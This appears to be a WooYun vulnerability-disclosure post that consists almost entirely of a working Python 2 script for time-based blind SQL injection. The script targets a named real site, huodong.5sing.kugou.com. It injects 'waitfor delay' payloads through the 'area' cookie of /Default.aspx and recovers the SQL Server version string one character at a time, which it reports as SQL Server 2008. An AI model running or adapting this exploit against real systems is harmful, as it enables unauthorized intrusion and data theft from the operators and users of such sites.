WooYun.org

web5singdbman

SQL Server version is Microsoft SQL Server 2008 SP

import httplib
import time
import string
import sys
import random
import urllib
headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0,10):
    payloads.append(str(i))
payloads += ['@','_', '.', '-', '\\', ' ']
print 'Try to retrive SQL Server Version:'
user = ''
for i in range(1,30,1):
    for payload in payloads:
        timeout_count = 0
        for j in range(1,3):
            try:
                conn = httplib.HTTPConnection('huodong.5sing.kugou.com', timeout=3)
                random.seed()
                area = str(random.random()) + "fasfa'; if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- "  % (i, ord(payload))
                headers['Cookie'] = "area=" + urllib.quote(area)
                start_time = time.time()
                conn.request(method='GET',
                             url= '/Default.aspx',
                             headers = headers)
                conn.getresponse()
                conn.close()
                print '.',
                break
            except:
                timeout_count += 1
        if timeout_count == 2:    # 2 times to confirm
            user += payload
            print '[In Progress]', user 
            break
print '\n[Done], SQL Server version is', user